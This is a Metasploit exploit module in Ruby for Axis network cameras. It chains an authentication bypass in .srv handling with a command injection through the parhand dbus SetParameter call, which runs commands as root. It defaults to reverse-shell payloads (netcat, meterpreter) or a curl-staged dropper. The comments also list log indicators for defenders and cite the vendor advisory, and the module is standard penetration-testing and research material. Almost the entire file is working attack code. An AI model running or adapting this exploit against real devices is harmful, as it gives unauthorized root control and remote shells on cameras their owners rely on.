Path: blob/master/modules/exploits/linux/http/axis_srv_parhand_rce.rb
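##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

# Metasploit module for the Axis network camera issues listed under
# 'References' (an authentication bypass in the .srv handling combined with a
# command injection in parhand, per the module description).
#
# What this code puts on the wire, useful when reviewing web or proxy logs for
# affected devices:
#   * requests to "/index.html/<8-42 alphanumeric characters>.srv"
#   * POST bodies with action=dbus whose args name com.axis.PolicyKitParhand,
#     a SetParameter call on root.Time.DST.Enabled followed by SynchParameters
#
# Remediation is described in the vendor advisory linked in 'References'.
class MetasploitModule < Msf::Exploit::Remote

  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::CmdStager

  # Registers the module metadata: references, the two targets (an in-memory
  # Unix command target and an ARMLE Linux dropper, the latter being the
  # default) and their default payloads.
  #
  # @param info [Hash] metadata passed in by the framework and merged with the
  #   values below through update_info
  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Axis Network Camera .srv-to-parhand RCE',
      'Description'    => %q{
        This module exploits an auth bypass in .srv functionality and a
        command injection in parhand to execute code as the root user.
      },
      'Author'         => [
        'Or Peles',       # Vulnerability discovery (VDOO)
        'wvu',            # Metasploit module
        'sinn3r',         # Metasploit module
        'Brent Cook',     # Metasploit module
        'Jacob Robles',   # Metasploit module
        'Matthew Kienow', # Metasploit module
        'Shelby Pace',    # Metasploit module
        'Chris Lee',      # Metasploit module
        'Cale Black'      # Metasploit module
      ],
      'References'     => [
        ['CVE', '2018-10660'],
        ['CVE', '2018-10661'],
        ['CVE', '2018-10662'],
        ['URL', 'https://blog.vdoo.com/2018/06/18/vdoo-discovers-significant-vulnerabilities-in-axis-cameras/'],
        ['URL', 'https://www.axis.com/files/faq/Advisory_ACV-128401.pdf']
      ],
      'DisclosureDate' => '2018-06-18',
      'License'        => MSF_LICENSE,
      'Platform'       => ['unix', 'linux'],
      'Arch'           => [ARCH_CMD, ARCH_ARMLE],
      'Privileged'     => true,
      'Targets'        => [
        ['Unix In-Memory',
          'Platform'       => 'unix',
          'Arch'           => ARCH_CMD,
          'Type'           => :unix_memory,
          'Payload'        => {
            'BadChars' => ' ',
            'Encoder'  => 'cmd/ifs',
            'Compat'   => {
              'PayloadType' => 'cmd',
              'RequiredCmd' => 'netcat-e'
            }
          },
          'DefaultOptions' => {
            'PAYLOAD' => 'cmd/unix/reverse_netcat_gaping'
          }
        ],
        ['Linux Dropper',
          'Platform'       => 'linux',
          'Arch'           => ARCH_ARMLE,
          'Type'           => :linux_dropper,
          'DefaultOptions' => {
            'PAYLOAD' => 'linux/armle/meterpreter_reverse_tcp'
          }
        ]
      ],
      'DefaultTarget'  => 1,
      'DefaultOptions' => {'WfsDelay' => 10}
    ))
  end

  # Probes the target with a single GET for a randomly named .srv path under
  # /index.html/ and classifies the answer.
  #
  # @return [CheckCode::Appears] when the device answers with HTTP 204
  # @return [CheckCode::Safe] when it answers with any other status
  # @return [CheckCode::Unknown] when no response was received
  def check
    res = send_request_cgi(
      'method' => 'GET',
      'uri'    => "/index.html/#{rand_srv}"
    )

    # A timeout or connection failure says nothing about the firmware, so it
    # must not be reported as "Safe"; that would be a false negative in an
    # exposure assessment.
    return CheckCode::Unknown unless res
    return CheckCode::Appears if res.code == 204

    CheckCode::Safe
  end

  # Dispatches on the selected target type: the in-memory target sends the
  # encoded command payload directly, the dropper target stages a binary
  # through the CmdStager mixin using the curl flavor.
  def exploit
    case target['Type']
    when :unix_memory
      execute_command(payload.encoded)
    when :linux_dropper
      execute_cmdstager(flavor: :curl, nospace: true)
    end
  end

  # Issues the two POST requests that carry one command string: a SetParameter
  # call that writes a value containing the command into
  # root.Time.DST.Enabled, then a SynchParameters call.
  # NOTE(review): the second call is presumably what makes parhand process the
  # stored value; confirm against the advisory in 'References'.
  #
  # Neither response is inspected, so a failed request is not detected here.
  #
  # @param cmd [String] command string to embed in the parameter value
  # @param opts [Hash] accepted but not read in this method
  def execute_command(cmd, opts = {})
    send_request_cgi(
      'method'    => 'POST',
      'uri'       => "/index.html/#{rand_srv}",
      'vars_post' => {
        'action' => 'dbus',
        'args'   => dbus_send(
          method: :set_param,
          param:  "string:root.Time.DST.Enabled string:;(#{cmd})&"
        )
      }
    )

    send_request_cgi(
      'method'    => 'POST',
      'uri'       => "/index.html/#{rand_srv}",
      'vars_post' => {
        'action' => 'dbus',
        'args'   => dbus_send(method: :synch_params)
      }
    )
  end

  # Builds the argument string for a system-bus method call addressed to
  # com.axis.PolicyKitParhand.
  #
  # @param method [Symbol] :set_param or :synch_params; any other value makes
  #   the case expression yield nil and the append raise TypeError
  # @param param [String, nil] arguments appended after SetParameter; only
  #   used for :set_param
  # @return [String] the assembled argument string
  def dbus_send(method:, param: nil)
    args = '--system --dest=com.axis.PolicyKitParhand ' \
           '--type=method_call /com/axis/PolicyKitParhand '

    args <<
      case method
      when :set_param
        "com.axis.PolicyKitParhand.SetParameter #{param}"
      when :synch_params
        'com.axis.PolicyKitParhand.SynchParameters'
      end

    args
  end

  # Returns a file name made of 8 to 42 random alphanumeric characters with a
  # ".srv" extension; a fresh name is generated for every request.
  #
  # @return [String]
  def rand_srv
    "#{Rex::Text.rand_text_alphanumeric(8..42)}.srv"
  end

end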